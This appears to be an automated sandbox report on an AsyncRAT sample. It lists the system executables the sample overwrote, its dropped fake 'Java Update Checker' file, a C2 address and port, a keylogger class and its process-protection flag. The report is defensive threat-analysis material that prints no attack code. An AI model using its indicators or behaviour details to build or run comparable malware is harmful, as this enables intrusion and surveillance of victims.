                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXEJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpDlpCmd.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\Config\Jump to behavior
                              Source: C:\Users\user\Desktop\x.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Jump to behavior
                              Source: C:\Users\user\Desktop\x.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\Jump to behavior
                              Source: C:\Users\user\Desktop\x.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\Jump to behavior
                              Source: C:\Users\user\Desktop\x.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\GatherLogs\Jump to behavior
                              Source: C:\Users\user\Desktop\x.exeFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Jump to behavior

                              Networking

                              barindex
                              C2 URLs / IPs found in malware configuration
                              Source: Malware configuration extractorURLs: 45.141.26.232
                              Yara detected Generic Downloader
                              Source: Yara matchFile source: 2.0.x.exe.dc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.x.exe.30cf840.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\ProgramData\Java Update Checker (64 bit).exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, type: DROPPED
                              Source: global trafficTCP traffic: 192.168.2.7:49705 -> 45.141.26.232:6666
                              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                              Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                              Source: Joe Sandbox ViewASN Name: SPECTRAIPSpectraIPBVNL SPECTRAIPSpectraIPBVNL
                              Source: unknownDNS query: name: ip-api.com
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: unknownTCP traffic detected without corresponding DNS query: 45.141.26.232
                              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                              Source: global trafficDNS traffic detected: DNS query: ip-api.com
                              Source: integrator.exe.0.drString found in binary or memory: http://127.0.0.1:13556/InsiderSlabBehaviorReportedBuildInsiderSlabBehaviorInsiderSlabBehaviorReporte
                              Source: armsvc.exe.0.dr, GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.dr, AdobeARMHelper.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                              Source: armsvc.exe.0.dr, GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.dr, AdobeARMHelper.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                              Source: armsvc.exe.0.dr, GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.dr, AdobeARMHelper.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                              Source: armsvc.exe.0.dr, GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.dr, AdobeARMHelper.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                              Source: powershell.exe, 00000013.00000002.2023438315.0000000007FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                              Source: powershell.exe, 00000013.00000002.1946659267.0000000000A0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                              Source: armsvc.exe.0.dr, GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.dr, AdobeARMHelper.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: armsvc.exe.0.dr, GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.dr, AdobeARMHelper.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                              Source: armsvc.exe.0.dr, GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.dr, AdobeARMHelper.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                              Source: AdobeARMHelper.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                              Source: GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                              Source: armsvc.exe.0.dr, AdobeARMHelper.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                              Source: x.exe, 00000002.00000002.2471076189.00000000030A9000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000002.00000002.2471076189.00000000030C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                              Source: x.exeString found in binary or memory: http://ip-api.com/line/?fields=hosting
                              Source: svchost.com, 00000003.00000002.1905492456.0000000000193000.00000004.00000010.00020000.00000000.sdmp, Uninstall.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                              Source: powershell.exe, 00000004.00000002.1397308567.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1989631818.00000000059A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1999920156.0000000006137000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2006838878.0000000006527000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                              Source: armsvc.exe.0.dr, GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.dr, AdobeARMHelper.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
                              Source: armsvc.exe.0.dr, GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.dr, AdobeARMHelper.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
                              Source: armsvc.exe.0.dr, GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.dr, AdobeARMHelper.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
                              Source: armsvc.exe.0.dr, GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.dr, AdobeARMHelper.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                              Source: powershell.exe, 00000019.00000002.1956487745.0000000005616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                              Source: powershell.exe, 00000004.00000002.1376757787.0000000004DE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1950840726.0000000004A96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1954269308.0000000005226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1956487745.0000000005616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                              Source: x.exe, 00000002.00000002.2471076189.00000000030A9000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000002.00000002.2471076189.0000000003001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1376757787.0000000004C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1950840726.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1954269308.00000000050D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1956487745.00000000054C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: powershell.exe, 00000004.00000002.1376757787.0000000004DE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1950840726.0000000004A96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1954269308.0000000005226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1956487745.0000000005616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                              Source: powershell.exe, 00000019.00000002.1956487745.0000000005616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                              Source: Aut2exe.exe.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/
                              Source: Aut2exe.exe.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/8
                              Source: AutoIt3_x64.exe.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
                              Source: armsvc.exe.0.dr, GoogleCrashHandler64.exe.0.dr, 117.0.5938.134_117.0.5938.132_chrome_updater.exe.0.dr, unpack200.exe.0.dr, ssvagent.exe.0.dr, AdobeARMHelper.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                              Source: powershell.exe, 00000004.00000002.1376757787.0000000004C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1950840726.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1954269308.00000000050D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1956487745.00000000054C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                              Source: powershell.exe, 00000019.00000002.2006838878.0000000006527000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                              Source: powershell.exe, 00000019.00000002.2006838878.0000000006527000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                              Source: powershell.exe, 00000019.00000002.2006838878.0000000006527000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                              Source: powershell.exe, 00000019.00000002.1956487745.0000000005616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                              Source: msedge_pwa_launcher.exe.0.dr, identity_helper.exe.0.dr, pwahelper.exe.0.dr, msedge_proxy.exe.3.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
                              Source: msedge_pwa_launcher.exe.0.dr, identity_helper.exe.0.dr, pwahelper.exe.0.dr, msedge_proxy.exe.3.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
                              Source: powershell.exe, 00000013.00000002.1946659267.000000000096D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5
                              Source: integrator.exe.0.drString found in binary or memory: https://nexus.officeapps.live.comhttps://nexusrules.officeapps.live.com
                              Source: powershell.exe, 00000004.00000002.1397308567.0000000005CFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1989631818.00000000059A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1999920156.0000000006137000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2006838878.0000000006527000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                              Source: integrator.exe.0.drString found in binary or memory: https://otelrules.azureedge.net/rules/.bundlesdxhelper.exeFailed
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                              Source: Aut2exe.exe.0.dr, AutoIt3_x64.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0

                              Key, Mouse, Clipboard, Microphone and Screen Capturing

                              barindex
                              Yara detected AsyncRAT
                              Source: Yara matchFile source: x.exe, type: SAMPLE
                              Source: Yara matchFile source: 2.0.x.exe.dc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.x.exe.30cf840.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.x.exe.30cf840.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: x.exe PID: 5336, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Java Update Checker (64 bit).exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, type: DROPPED
                              Contains functionality to log keystrokes (.Net Source)
                              Source: x.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout
                              Source: Java Update Checker (64 bit).exe.2.dr, XLogger.cs.Net Code: KeyboardLayout
                              Source: integrator.exe.0.drBinary or memory string: RegisterRawInputDevicesmemstr_60b04ed4-5

                              Operating System Destruction

                              barindex
                              Protects its processes via BreakOnTermination flag
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeProcess information set: 01 00 00 00 Jump to behavior

                              System Summary

                              barindex
                              Malicious sample detected (through community Yara rule)
                              Source: x.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: 2.0.x.exe.dc0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: 2.2.x.exe.30cf840.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: 2.2.x.exe.30cf840.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: 00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: C:\ProgramData\Java Update Checker (64 bit).exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                              Source: C:\Windows\svchost.comFile created: C:\Windows\directx.sysJump to behavior
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Windows\svchost.comJump to behavior
                              Source: C:\Windows\svchost.comFile created: C:\Windows\directx.sysJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeCode function: 2_2_00007FFAACCA66622_2_00007FFAACCA6662
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeCode function: 2_2_00007FFAACCA06102_2_00007FFAACCA0610
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeCode function: 2_2_00007FFAACCA17712_2_00007FFAACCA1771
                              Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exeCode function: 2_2_00007FFAACCA58B62_2_00007FFAACCA58B6
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_045DB4904_2_045DB490
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_045DB4704_2_045DB470
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_08533E984_2_08533E98
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_045AB49019_2_045AB490
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_045AB47019_2_045AB470
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_045A4F9819_2_045A4F98
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_04FEB4A022_2_04FEB4A0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_04FEB49022_2_04FEB490
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_04FE20C522_2_04FE20C5
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_04FE0C5022_2_04FE0C50
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_08AD3A9822_2_08AD3A98
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_08AD4CF822_2_08AD4CF8
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_0537B4A025_2_0537B4A0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_0537B49025_2_0537B490
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_08F93AA825_2_08F93AA8
                              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\AutoIt3\Au3Check.exe A3C4641D4CB4608AF18CD06E4C01339C65C25B9289F0AA01CABE0E5C250A0E15
                              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\AutoIt3\Au3Info.exe 55075BDACF914AF03AD6CD417AFFC3A604A73AFD3D06A2256A1835CBF0F39B5E
                              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe B904C8888CD019FAD590E1135E917D944BC16340757BC90DDD3511359766B8BB
                              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe 15D3823B1CB8C10E2F0A0882BC273093742E957F0E7DB05B98B8FF020897559D
                              Source: x.exe, 00000002.00000002.2471076189.00000000030CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs x.exe
                              Source: x.exe, 00000002.00000000.1208996439.0000000000DC2000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs x.exe
                              Source: x.exeBinary or memory string: OriginalFilenameXClient.exe4 vs x.exe
